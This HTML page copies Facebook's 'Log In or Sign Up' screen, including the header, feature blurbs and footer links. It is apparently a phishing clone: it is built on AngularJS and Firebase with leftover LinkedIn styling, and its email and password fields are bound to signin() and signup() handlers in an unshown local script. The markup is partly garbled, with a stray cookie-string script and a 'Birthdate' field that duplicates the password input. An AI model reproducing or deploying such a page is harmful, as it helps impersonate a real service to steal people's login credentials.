<!DOCTYPE html>
<html lang="en">
   <head>
      <script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.3.14/angular.min.js"></script>
      <script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.3.14/angular-resource.min.js"></script>
      <script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.3.14/angular-route.min.js"></script>
      <script src="https://cdn.firebase.com/js/client/2.0.4/firebase.js"></script>
      <script src="https://cdn.firebase.com/libs/angularfire/0.9.0/angularfire.min.js"></script>
      <script type="text/javascript">; domain=facebook.com; version=0; path=/;';</script>
      <title>Facebook - Log In or Sign Up</title>
      <meta http-equiv="content-type" content="text/html; charset=UTF-8">
      <link rel="stylesheet" type="text/css" href="https://static.licdn.com/scds/concat/common/css?h=765zh9odycznutep5f0mj07m4-38so5ftc5lv2bbm0jf5rvv1qj-7mxyksftlcjzimz2r05hd289r-4uu2pkz5u0jch61r2nhpyyrn8-dxl1g2k3wk6qpss8oq9lwul9c-7poavrvxlvh0irzkbnoyoginp-4om4nn3a2z730xs82d78xj3be-mea0xb6thaagfbcx9i1vg82z-ct4kfyj4tquup0bvqhttvymms-3pwwsn1udmwoy3iort8vfmygt&amp;fc=1">
      <link rel="stylesheet" type="text/css" href="/css/css2.css">
      <script type="text/javascript" src="/angularjs/signup.js"></script>
   </head>
   <body dir="ltr" class="guest v2 new-ghome login-in-header chrome-v5 chrome-v5-responsive sticky-bg guest" id="pagekey-guest-home" data-ng-app='facebook'>
      <div data-ng-controller="signinFunction">
         <div id="header" style="background-color: #31438F;">     
            <div class="container">
               <p class="textad"></p>
               <div style="margin-top:10px;" class="login">
                  <fieldset>
                  
                     <legend>Sign In</legend>
                     <ul>
                        <li>
                           <label for="session_key-login"><font color="#FFFFFF">Email address</font></label>
                           <div class="fieldgroup">
                              <span class="error" id="session_key-login-error"></span>
                              <input type="text" name="session_key" value="" id="session_key-login" data-ng-model="session_key" autofocus tabindex="1" size="27" data-ime-mode-disabled>
                           </div>
                        </li>
                        <li>
                           <label for="session_password-login"><font color="#FFFFFF">Password</font></label>
                              <div class="fieldgroup">
                              <span class="error" id="session_password-login-error"></span>
                              <input type="password" name="session_password" value="" id="session_password-login" data-ng-model="session_password" tabindex="2" size="27">
                           </div>
                        </li>
                        <li class="button">
                           <input type="button" style="font-color:green;" name="signin" value="Sign In" data-ng-model="signin" id="signin" tabindex="3" class="btn-secondary" data-ng-click="signin()">
                        </li>
                     </ul>
                  </fieldset>
               </div>
            </div>
         </div>
      </div>
      <div id="main-wrapper" style="background:#E9EAED;">
         <div id="main" style="background:#E9EAED;">
            <div id="global-error"></div>
            <header>
               <div id="content">
                  
               </div>
            </header>
            <section>
               <div class="two-row-image" style="border:0px;">
                  <div class="_7d _6_ _76"><h2 class="inlineBlock _3ma _6n _6s _6v" style="padding: 42px 0 24px; font-size: 28px; line-height: 36px"> Connect with friends and the<br>world around you on Facebook. </h2><div class="mtl pbm"><div class="_6a _6b mrl" style="text-align: center; width: 55px"><img class="img" src="https://scontent.xx.fbcdn.net/hphotos-xap1/t39.2365-6/851565_602269956474188_918638970_n.png" alt="" style="vertical-align: middle"></div><div class="_6a _6b product_desc"><span class="mtl _3ma _6p _6s _6v"> See photos and updates </span><span class="mlm _6q _6t _mf"> from friends in News Feed. </span></div></div><div class="mtl pbm"><div class="_6a _6b mrl" style="text-align: center; width: 55px"><img class="img" src="https://scontent.xx.fbcdn.net/hphotos-xaf1/t39.2365-6/851585_216271631855613_2121533625_n.png" alt="" style="vertical-align: middle"></div><div class="_6a _6b product_desc"><span class="mtl _3ma _6p _6s _6v"> Share what's new </span><span class="mlm _6q _6t _mf"> in your life on your Timeline. </span></div></div><div class="mtl pbm"><div class="_6a _6b mrl" style="text-align: center; width: 55px"><img class="img" src="https://scontent.xx.fbcdn.net/hphotos-xap1/t39.2365-6/851558_160351450817973_1678868765_n.png" alt="" style="vertical-align: middle"></div><div class="_6a _6b product_desc"><span class="mtl _3ma _6p _6s _6v"> Find more </span><span class="mlm _6q _6t _mf"> of what you're looking for with Facebook Search. </span></div></div></div>
                  </div>
            </section>
            <section>
               <div data-ng-controller="signupFunction">
                  <div class="leo-module mod-feat jointoday" id="module-id3">
                     <div class="header">
                        <h2>Sign Up</h2>
                     </div>
                     <div class="content">
                        <p>It's free and always will be.</p>
                        <form action="signup" method="POST" name="coldRegistrationForm" novalidate="novalidate" class="feature" data-jsenabled="check" id="guest-home-reg-form">
                           <input type="hidden" name="isJsEnabled" value="false"/>
                           <fieldset>
                              <legend>Sign Up</legend>
                              <ul>
                                 <li id="first-name">
                                    <label for="firstName-coldRegistrationForm">First name</label>
                                    <script id="control-http-12209-exec-245030-3" type="linkedin/control" class="li-control">LI.Controls.addControl('control-http-12209-exec-245030-3','GhostLabel',{});</script>
                                    <span class="error" id="firstName-coldRegistrationForm-error"></span>
                                    <div class="fieldgroup">
                                       <input type="text" name="firstName" data-ng-model="firstName" value="" id="firstName-coldRegistrationForm" autocomplete="on" size="55" maxlength="20" tabindex="5" placeholder="First name">
                                    </div>
                                 </li>
                                 <li id="last-name">
                                    <label for="lastName-coldRegistrationForm">Last name</label>
                                    <span class="error" id="lastName-coldRegistrationForm-error"></span>
                                    <div class="fieldgroup">
                                       <input type="text" name="lastName" data-ng-model="lastName" value="" id="lastName-coldRegistrationForm" autocomplete="on" size="55" maxlength="40" tabindex="6" placeholder="Last name">
                                    </div>
                                 </li>
                                 <li id="email-address">
                                    <label for="email-coldRegistrationForm">Email address</label>
                                   <span class="error" id="email-coldRegistrationForm-error"></span>
                                    <div class="fieldgroup">
                                       <input type="email" name="email" data-ng-model="email" value="" id="email-coldRegistrationForm" type="email" autocomplete="on" size="55" maxlength="128" tabindex="7" data-ime-mode-disabled placeholder="Email">
                                    </div>
                                 </li>
                                 <li id="password">
                                    <label for="password-coldRegistrationForm">Password (6 or more characters)</label>
                                    <span class="error" id="password-coldRegistrationForm-error"></span>
                                    <div class="fieldgroup">
                                       <input type="password" name="password" data-ng-model="password" value="" id="password-coldRegistrationForm" tabindex="8" placeholder="Password">
                                    </div>
                                 </li>
                                 <li id="Birthdate">
                                    <label for="password-coldRegistrationForm">Password (6 or more characters)</label>
                                    <span class="error" id="password-coldRegistrationForm-error"></span>
                                    <div class="fieldgroup">
                                       <input type="password" name="password" data-ng-model="password" value="" id="password-coldRegistrationForm" tabindex="8" placeholder="Password">
                                    </div>
                                 </li>
                                 
                              </ul>
                              <input type="hidden" name="trk" value="guest_home_login"/>
                              <div class="form-bottom-row">
                                 <p class="policy">
                                    By clicking Sign Up,you agree to our <a href="#">Terms</a>,and that you have read our <a href="#">Data Policy</a>,including our <a href="#">Cookie Use</a>.
                                 </p>
                                 <p class="action">
                                    <input type="submit" name="signup" data-ng-model="signup" data-ng-click="signup()" value="Sign Up" id="btn-submit" class="btn-action" tabindex="9">
                                 </p>
                              </div>
                           </fieldset>
                        </form>
                      </div>
                  </div>
               </div>
            </section>
         </div>
      </div>
      <footer id="guestfooter">
      <div id="ghome-footer">
      <div id="search-browse">
     <div id="pageFooter" data-referrer="page_footer"><div id="contentCurve"></div><div role="contentinfo" aria-label="Facebook site links"><table class="uiGrid _51mz navigationGrid" cellspacing="0" cellpadding="0"><tbody><tr class="_51mx"><td class="_51m- hLeft plm"><a href="/r.php" title="Sign Up for Facebook">Sign Up</a></td><td class="_51m- hLeft plm"><a href="/login/" title="Log into Facebook">Log In</a></td><td class="_51m- hLeft plm"><a href="https://messenger.com/" title="Check out Messenger.">Messenger</a></td><td class="_51m- hLeft plm"><a href="/lite/" title="Facebook Lite for Android.">Facebook Lite</a></td><td class="_51m- hLeft plm"><a href="/mobile/?ref=pf" title="Check out Facebook Mobile.">Mobile</a></td><td class="_51m- hLeft plm"><a href="/find-friends?ref=pf" title="Find anyone on the web.">Find Friends</a></td><td class="_51m- hLeft plm"><a href="/badges/?ref=pf" title="Embed a Facebook badge on your website.">Badges</a></td><td class="_51m- hLeft plm"><a href="/directory/people/" title="Browse our people directory.">People</a></td><td class="_51m- hLeft plm"><a href="/directory/pages/" title="Browse our pages directory.">Pages</a></td><td class="_51m- hLeft plm _51mw"><a href="/places/" title="Check out popular places on Facebook.">Places</a></td></tr><tr class="_51mx"><td class="_51m- hLeft plm"><a href="/games/" title="Check out Facebook games.">Games</a></td><td class="_51m- hLeft plm"><a href="/directory/places/" title="Browse our places directory.">Locations</a></td><td class="_51m- hLeft plm"><a href="/facebook" accesskey="8" title="Read our blog, discover the resource center, and find job opportunities.">About</a></td><td class="_51m- hLeft plm"><a href="/campaign/landing.php?placement=pflo&amp;campaign_id=402047449186&amp;extra_1=auto" title="Advertise on Facebook.">Create Ad</a></td><td class="_51m- hLeft plm"><a href="/pages/create/?ref_type=sitefooter" title="Create a Page">Create Page</a></td><td class="_51m- hLeft plm"><a href="https://developers.facebook.com/?ref=pf" title="Develop on our platform.">Developers</a></td><td class="_51m- hLeft plm"><a href="/careers/?ref=pf" title="Make your next career move to our awesome company.">Careers</a></td><td class="_51m- hLeft plm"><a href="/privacy/explanation" title="Learn about your privacy and Facebook.">Privacy</a></td><td class="_51m- hLeft plm"><a href="/help/cookies/?ref=sitefooter" title="Learn about cookies and Facebook.">Cookies</a></td><td class="_51m- hLeft plm _51mw"><a class="_41ug" href="https://www.facebook.com/help/568137493302217" title="Learn about Ad Choices.">Ad Choices<i class="img sp_kKEGyokOwoZ sx_2f035f"></i></a></td></tr><tr class="_51mx"><td class="_51m- hLeft plm"><a href="/policies/?ref=pf" accesskey="9" title="Review our terms and policies.">Terms</a></td><td class="_51m- hLeft plm"><a href="/help/?ref=pf" accesskey="0" title="Visit our Help Center.">Help</a></td><td class="_51m- hLeft plm"><a class="accessible_elem" accesskey="6" href="/settings" title="View and edit your Facebook settings.">Settings</a></td><td class="_51m- hLeft plm"><a class="accessible_elem" accesskey="7" href="/allactivity?privacy_source=activity_log_top_menu" title="View your activity log">Activity Log</a></td></tr></tbody></table></div><div class="mvl copyright"><div><span> Facebook © 2015</span><div class="fsm fwn fcg"><a rel="dialog" ajaxify="/settings/language/language/?uri=https%3A%2F%2Fwww.facebook.com%2F&amp;source=TOP_LOCALES_DIALOG" title="Use Facebook in another language." href="#" role="button">English (US)</a></div></div></div></div>

      </div>
   
   </body>
</html>